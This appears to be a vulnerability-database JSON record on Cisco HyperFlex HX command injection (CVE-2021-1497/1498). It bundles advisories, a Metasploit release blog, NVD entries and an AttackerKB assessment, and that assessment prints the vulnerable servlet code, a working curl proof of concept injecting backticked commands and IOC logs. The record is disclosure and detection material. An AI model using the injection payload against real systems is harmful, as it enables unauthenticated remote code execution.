fail_with(Failure::PayloadFailed, 'Failed to execute command')\n end\n\n print_good('Successfully executed command')\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36357", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:31:07", "description": "A remote command execution vulnerability exists in Cisco Hyperflex. The vulnerability is due to improper input sanitization.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-20T00:00:00", "type": "checkpoint_advisories", "title": "Cisco HyperFlex HX Command Injection (CVE-2021-1498; CVE-2021-1497)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2021-11-17T00:00:00", "id": "CPAI-2021-0416", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:12:13", "description": "A command injection vulnerability exists in Cisco HyperFlex HX. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {}, "published": "2022-06-16T00:00:00", "type": "checkpoint_advisories", "title": "Cisco HyperFlex HX Command Injection (CVE-2021-1497)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1497"], "modified": "2022-06-16T00:00:00", "id": "CPAI-2022-0284", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7blog": [{"lastseen": "2021-06-12T01:03:26", "description": "## NSClient++\n\n\n\nCommunity contributor Yann Castel has contributed an exploit module for NSClient++ which targets an authenticated command execution vulnerability. Users that are able to authenticate to the service as admin can leverage the external scripts feature to execute commands with SYSTEM level privileges. This allows the underlying server to be compromised. Castel is also working on another exploit module for NSClient++ which happens to be a local privilege escalation so stay tuned for more NSClient++ content.\n\n## REDIS Improvements\n\nCommunity member Smashery returned to improve the Framework\u2019s REDIS dumping capabilities. This week two bugs were fixed to ensure that REDIS data can be more easily accessed using the `auxiliary/gather/redis_extractor` module. This module has seen a number of improvements lately and is capable of dumping data from both authenticated and unauthenticated instances.\n\n## POST API Improvements\n\nGoogle Summer of Code student and community member pingport80 has been hard at work making a number of improvements to the POST API used by modules to interact with sessions. The bulk of the improvements have been focused on closing feature gaps in various scenarios. One excellent example of this is the new Process library that allows both shell and Meterpreter sessions to enumerate running processes on multiple platforms. This makes it easier for module developers to write content without worrying about the different capabilities of the various session types.\n\nPingport80 has also been testing various scenarios to find issues related to localization. This has involved finding instances where error messages that are assumed to be in English are used to determine various outcomes and updating them to function regardless of the underlying locale.\n\n## New module content (2)\n\n * [Cisco HyperFlex HX Data Platform Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15281>) by [wvu](<https://github.com/wvu-r7>), Mikhail Klyuchnikov, and Nikita Abramov, which exploits [CVE-2021-1498](<https://attackerkb.com/topics/V6mTqsTWkw/cve-2021-1498?referrer=blog>) \\- Added an exploit for [CVE-2021-1497](<https://attackerkb.com/topics/mDqlWhQovO/cve-2021-1497?referrer=msfReleaseNotes>)/[CVE-2021-1498](<https://attackerkb.com/topics/V6mTqsTWkw/cve-2021-1498?referrer=msfReleaseNotes>), a command injection in Cisco HyperFlex HX Data Platform.\n * [NSClient++ 0.5.2.35 - ExternalScripts Authenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/15305>) by [Yann Castel](<https://github.com/Hakyac>) and kindredsec - This module allows an attacker with knowledge of the admin password of NSClient++ 0.5.2.35 to start a privilege reverse shell, so long as the attacker has the admin password, and the NSClient++has both the web interface and ExternalScripts feature enabled.\n\n## Enhancements and features\n\n * [#15296](<https://github.com/rapid7/metasploit-framework/pull/15296>) from [pingport80](<https://github.com/pingport80>) \\- The `command_exists?` method inside `post/common.rb` has been updated to fall back to using the `which` command to check if a command exists on a target system if `command -v` fails to run successfully. This allows users to check whether a command exists or not on systems that might not contain a `command` command, such as ESXi.\n * [#15299](<https://github.com/rapid7/metasploit-framework/pull/15299>) from [todb-r7](<https://github.com/todb-r7>) \\- The CONTRIBUTING.md documentation has been updated to include additional information on how to request CVEs for vulnerabilities from Rapid7.\n\n## Bugs fixed\n\n * [#15257](<https://github.com/rapid7/metasploit-framework/pull/15257>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The ` lib/msf/core/post_mixin.rb` library has been updated to correctly check if missing Meterpreter command IDs are core command IDs or an extension command ID and provide appropriate feedback to end users about this incompatibility. This also fixes an issue where Meterpreter might complain that it couldn't load an extension but wouldn't display what the extension was.\n * [#15284](<https://github.com/rapid7/metasploit-framework/pull/15284>) from [pingport80](<https://github.com/pingport80>) \\- This fixes a localization-related issue in the `post/linux/gather/pptpd_chap_secrets` module. If the file is unreadable, Metasploit would treat the permission denied error as the contents.\n * [#15290](<https://github.com/rapid7/metasploit-framework/pull/15290>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- Invalid Meterpeter command requirements in mixins no longer raise a Runtime error.\n * [#15293](<https://github.com/rapid7/metasploit-framework/pull/15293>) from [smashery](<https://github.com/smashery>) \\- This fixes two bugs in the Redis extractor module. The first was an issue that would occur when a value was excessively large. The second was a race condition that could be encountered if the server was being actively used by a third-party.\n * [#15312](<https://github.com/rapid7/metasploit-framework/pull/15312>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Ensures that msfconsole now supports setting both `RHOST` and `RHOSTS` interchangeably for all scenarios and modules\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.47...6.0.48](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-06-03T10%3A14%3A41-05%3A00..2021-06-10T14%3A21%3A04%2B01%3A00%22>)\n * [Full diff 6.0.47...6.0.48](<https://github.com/rapid7/metasploit-framework/compare/6.0.47...6.0.48>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-06-11T19:51:35", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2021-06-11T19:51:35", "id": "RAPID7BLOG:23D7FEEF87EC80463CD4EDB1EA568128", "href": "https://blog.rapid7.com/2021/06/11/metasploit-wrap-up-116/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-01-29T05:12:45", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \n**wvu-r7** at May 18, 2021 12:18am UTC reported:\n\n_Attacker value is a little lower because I was able to test only the installer._\n\n# CVE-2021-1497/CVE-2021-1498\n\nCommand injection in the `/storfs-asup` endpoint\u2019s `token` and `mode` parameters.\n\n## Patch\n \n \n --- unpatched/web.xml\t2021-05-17 19:06:17.000000000 -0500\n +++ patched/web.xml\t2021-05-17 19:06:23.000000000 -0500\n @@ -69,17 +69,6 @@\n \t</servlet-mapping>\n \n \t<servlet>\n -\t\t<servlet-name>Springpath Storfs ASUP</servlet-name>\n -\t\t<servlet-class>com.storvisor.sysmgmt.service.StorfsAsup</servlet-class>\n -\t\t<load-on-startup>1</load-on-startup>\n -\t</servlet>\n -\n -\t<servlet-mapping>\n -\t\t<servlet-name>Springpath Storfs ASUP</servlet-name>\n -\t\t<url-pattern>/storfs-asup/*</url-pattern>\n -\t</servlet-mapping>\n -\n -\t<servlet>\n \t\t<servlet-name>Springpath Upgrade Image Upload Service</servlet-name>\n \t\t<servlet-class>com.storvisor.sysmgmt.service.StorvisorFileUploader</servlet-class>\n \t</servlet>\n \n\n## Vulnerability\n \n \n protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n String action = request.getParameter(\"action\");\n if (action == null) {\n String msg = \"Action for the servlet need be specified.\";\n writeErrorResponse(response, msg);\n return;\n }\n try {\n String token = request.getParameter(\"token\");\n StringBuilder cmd = new StringBuilder();\n cmd.append(\"exec /bin/storfs-asup \");\n cmd.append(token);\n String mode = request.getParameter(\"mode\");\n cmd.append(\" \");\n cmd.append(mode);\n cmd.append(\" > /dev/null\");\n logger.info(\"storfs-asup cmd to run : \" + cmd);\n ProcessBuilder pb = new ProcessBuilder(new String[] { \"/bin/bash\", \"-c\", cmd.toString() });\n logger.info(\"Starting the storfs-asup now: \");\n long startTime = System.currentTimeMillis();\n Process p = pb.start();\n InputStream errStream = p.getErrorStream();\n String errMsg = FileUtils.readToString(errStream);\n int exitCode = p.waitFor();\n long timeTaken = System.currentTimeMillis() - startTime;\n logger.info(\"storfs-asup command completed in (\" + timeTaken + \" ) milliseconds, with exit code (\" + exitCode + \") and error message: \" + errMsg);\n errStream.close();\n OutputStream outStream = p.getOutputStream();\n outStream.flush();\n outStream.close();\n if (exitCode != 0)\n throw new Exception(errMsg);\n } catch (IOException ex) {\n logger.error(\"Failed to generate asup: \" + ex);\n } catch (Exception ie) {\n logger.error(\"Failed to run the /bin/storfs-asup command.\");\n } finally {\n logger.info(\"Done executing asup command. \");\n }\n }\n \n \n \n tomcat7@HyperFlex-Installer-4:~$ sudo -l\n Matching Defaults entries for tomcat7 on HyperFlex-Installer-4:\n !lecture, tty_tickets, !fqdn\n \n User tomcat7 may run the following commands on HyperFlex-Installer-4:\n (ALL) NOPASSWD: /opt/springpath/storfs-support/support.py\n (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_asup.sh\n (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_sch.sh\n tomcat7@HyperFlex-Installer-4:~$ sudo /opt/springpath/storfs-support/support.py --help\n Usage: support.py [options]\n \n Options:\n -h, --help show this help message and exit\n -t TARGET, --target=TARGET\n Target directory where the support bundle should go\n (XXX: This could be a remote host(dir), ex:\n hostname:/foo). Optional. Default = /tmp\n -i INSTALLDIR, --installdir=INSTALLDIR\n Install directory for storfs. Optional.\n -k ZKDIR, --zkdir=ZKDIR\n zookeeper directory for storfs. Optional\n -l LOGDIR, --logdir=LOGDIR\n log directory for storfs. Optional\n --asupdir=ASUPDIR asup directory for storfs. Optional\n -c COREDIR, --coredir=COREDIR\n core directory for storfs. Optional\n -m MANIFESTDIR, --manifestdir=MANIFESTDIR\n Manifest directory for storfs support. All files with\n .mfx extension in this directory will be processed.\n Optional\n --list List the manifests. Optional\n -f MANIFESTFILES, --manifest-file=MANIFESTFILES\n Manifest file to use for generating support. Multiple\n manifest files can be specified. Manifests files are\n required to have .mfx suffix. Optional (Cannot be with\n -m option)\n -e TOOLSEXEDIR, --toolsexedir=TOOLSEXEDIR\n log directory for storfs binary files. Optional\n --hypervdir=HYPERVDIR\n log directory for hyperv binary files. Optional\n -o TOOLSDIR, --toolsdir=TOOLSDIR\n Path for storfs tools. Optional\n -r RUNTIMEDIR, --runtimedir=RUNTIMEDIR\n Path for runtime dir (which contains\n storfs_running_process.pid files). Optional\n -b BUILDTYPE, --buildtype=BUILDTYPE\n Build type that was running. Optional. Default = debug\n -a ADDITIONAL_FILES, --additional-files=ADDITIONAL_FILES\n any additional files/directories (not in manifest)\n that should be added to the support bundle. Optional.\n --dry-run Process manifests to make sure that there are no\n errors\n tomcat7@HyperFlex-Installer-4:~$ ls /opt/springpath/storfs-support/*.mfx\n /opt/springpath/storfs-support/springpath-basic.mfx /opt/springpath/storfs-support/springpath-zookeeper-no-db.mfx\n /opt/springpath/storfs-support/springpath.mfx /opt/springpath/storfs-support/springpath-logs.mfx\n /opt/springpath/storfs-support/springpath-default-os.mfx /opt/springpath/storfs-support/springpath-extended.mfx\n /opt/springpath/storfs-support/springpath-default-asup.mfx /opt/springpath/storfs-support/deployment.mfx\n /opt/springpath/storfs-support/springpath-mgmt.mfx /opt/springpath/storfs-support/springpath-witness.mfx\n /opt/springpath/storfs-support/springpath-default-asup-cli-esx.mfx /opt/springpath/storfs-support/springpath-default-asup-hyperv.mfx\n /opt/springpath/storfs-support/springpath-zookeeper.mfx /opt/springpath/storfs-support/springpath-default-asup-esx.mfx\n /opt/springpath/storfs-support/springpath-default-event-asup.mfx /opt/springpath/storfs-support/springpath-perf.mfx\n /opt/springpath/storfs-support/springpath-default-asup-cli-hyperv.mfx /opt/springpath/storfs-support/springpath-exhaustive.mfx\n tomcat7@HyperFlex-Installer-4:~$ head /opt/springpath/storfs-support/springpath-basic.mfx\n # Springpath manifest file. Contains just basic logs.\n # Simplified from springpath-mgmt.mfx\n [\"copy\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"/var/jail/var/log/springpath\"]\n [\"copy\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"/etc/iptables_node_cluster.rules\"]\n [\"exec\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"iptables --list -n -v\"]\n [\"exec\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"bom-check.sh\"]\n [\"exec\", \"TIMEOUT=120\", \"IGNORE_ERROR\", \"mstcli cluster diag\"]\n [\"exec\", \"TIMEOUT=45\", \"IGNORE_ERROR\", \"mstcli cluster info\"]\n [\"exec\", \"TIMEOUT=45\", \"IGNORE_ERROR\", \"mstcli appliance list\"]\n [\"exec\", \"TIMEOUT=45\", \"IGNORE_ERROR\", \"mstcli datastore list\"]\n tomcat7@HyperFlex-Installer-4:~$\n \n\n## PoC\n \n \n wvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'\n * Trying 192.168.123.133...\n * TCP_NODELAY set\n * Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)\n > POST /storfs-asup HTTP/1.1\n > Host: 192.168.123.133\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Length: 28\n > Content-Type: application/x-www-form-urlencoded\n >\n * upload completely sent off: 28 out of 28 bytes\n < HTTP/1.1 200 OK\n < Server: nginx/1.8.1\n < Date: Tue, 18 May 2021 00:54:26 GMT\n < Content-Length: 0\n < Connection: keep-alive\n < Front-End-Https: on\n <\n * Connection #0 to host 192.168.123.133 left intact\n * Closing connection 0\n wvu@kharak:~$\n \n\n## IOCs\n \n \n ==> /var/log/nginx/access.log <==\n 192.168.123.1 - - [17/May/2021:17:54:26 -0700] \"POST /storfs-asup HTTP/1.1\" 200 0 \"-\" \"curl/7.64.1\"\n \n ==> /var/log/springpath/stBootstrapGuiBackend.log <==\n 2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null\n 2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():64 - Starting the storfs-asup now:\n 2021-05-18-00:54:26.017 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory\n 2021-05-18-00:54:26.020 [tomcat-http-2] ERROR com.storvisor.sysmgmt.service.StorfsAsup.processRequest():89 - Failed to run the /bin/storfs-asup command.\n 2021-05-18-00:54:26.020 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():91 - Done executing asup command.\n \n ==> /var/log/tomcat7/catalina.out <==\n 2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null\n 2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:64 - Starting the storfs-asup now:\n 2021-05-18-00:54:26.017 INFO com.storvisor.sysmgmt.service.StorfsAsup:71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory\n 2021-05-18-00:54:26.020 ERROR com.storvisor.sysmgmt.service.StorfsAsup:89 - Failed to run the /bin/storfs-asup command.\n 2021-05-18-00:54:26.020 INFO com.storvisor.sysmgmt.service.StorfsAsup:91 - Done executing asup command.\n \n ==> /var/log/tomcat7/localhost_access_log.2021-05-17.txt <==\n 127.0.0.1 - - [17/May/2021:17:54:26 -0700] \"POST /storfs-asup HTTP/1.0\" 200 -\n \n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-05T00:00:00", "type": "attackerkb", "title": "CVE-2021-1497", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090"], "modified": "2021-05-15T00:00:00", "id": "AKB:77557E97-8311-4C07-B6B7-5AE38B6A1069", "href": "https://attackerkb.com/topics/mDqlWhQovO/cve-2021-1497", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-20T11:20:12", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \n**wvu-r7** at May 18, 2021 12:23am UTC reported:\n\nSee [CVE-2021-1497](<https://attackerkb.com/assessments/4f532147-b27b-4079-aed1-5cfdc402cf5c>).\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-05T00:00:00", "type": "attackerkb", "title": "CVE-2021-1498", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090"], "modified": "2021-05-18T00:00:00", "id": "AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244", "href": "https://attackerkb.com/topics/V6mTqsTWkw/cve-2021-1498", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:48:25", "description": "Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-1275", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1275"], "modified": "2021-05-13T19:35:00", "cpe": [], "id": "CVE-2021-1275", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1275", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": []}, {"lastseen": "2022-10-21T21:01:23", "description": "Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-1506", "cwe": ["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1506"], "modified": "2022-10-21T19:43:00", "cpe": [], "id": "CVE-2021-1506", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1506", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-08-05T19:23:16", "description": "Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-1505", "cwe": ["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1505"], "modified": "2022-08-05T16:15:00", "cpe": [], "id": "CVE-2021-1505", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1505", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T12:53:38", "description": "Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-1508", "cwe": ["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1508"], "modified": "2021-05-14T14:27:00", "cpe": [], "id": "CVE-2021-1508", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1508", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T12:53:24", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-1498", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1498"], "modified": "2021-06-07T20:57:00", "cpe": ["cpe:/o:cisco:hyperflex_hx_data_platform:4.5\\(2a\\)"], "id": "CVE-2021-1498", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1498", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": 